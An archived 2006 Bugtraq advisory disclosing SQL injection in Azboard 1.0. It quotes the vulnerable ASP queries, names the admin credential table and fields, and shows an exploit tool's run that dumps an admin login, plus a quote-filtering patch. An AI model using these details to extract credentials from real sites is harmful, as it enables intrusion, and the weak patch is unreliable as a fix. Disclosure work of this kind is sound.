NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2006-05

Azboard <= 1.0 Multiple Sql Injections

geinbluesgmail.com
Date: Sun May 14 2006 - 21:43:15 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Title : Azboard <= 1.0 Multiple Sql Injections

Published : 2006.5.14
Author : x90c(정경주)chollian.net/~jyj9782/
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

Azboard is a web board written in asp (active server pages).
It has a sql injection hole. so we can get the admin(bbs)'s
Id and password and so on. let's start to see what is the code..

0x02 Codes

~/azboard/list.asp:
-
49: if searchstring<>"" then
50: sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' "
51: else
52: sql="select count(board_idx) from board where cate='"&cate&"'"
53: end if
-

above lines are vulnerable to sql attak as you can see. y0! ;)~

~/azboard/admin_ok.asp:
-
27: SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'"
-

i found the fields('admin_id', 'admin_pass') and table('board_admin') in this file.

0x03 Exploit

[rootebp exploits]# ls -al azboard_blue.c
-rw-r--r-- 1 root root 4771 5월 14 23:30 azboard_blue.c
[rootebp exploits]# ls -al azboard_blue
-rwxr-xr-x 1 root root 17163 5월 14 23:30 azboard_blue
[rootebp exploits]#
[rootebp exploits]# make azboard_blue
cc azboard_blue.c -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[rootebp exploits]# ./azboard_blue

azaboard 1.0 <= 0day :

$ ./azboard_blue <azboard URL> <cate>

~ x90cchollian.net/~jyj9782

[rootebp exploits]#
[rootebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[rootebp exploits]#

0x04 Patch

~/azboard/list.asp:
..
if instr(search, "\'") > 0 or instr(cate, "\'") > 0 or instr(cate, "\'") > 0 then
Response.redirect "error.asp"
end if
..

Thanks for many 0p3n-H4ck3rz!

- Blu3h4t Team.

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]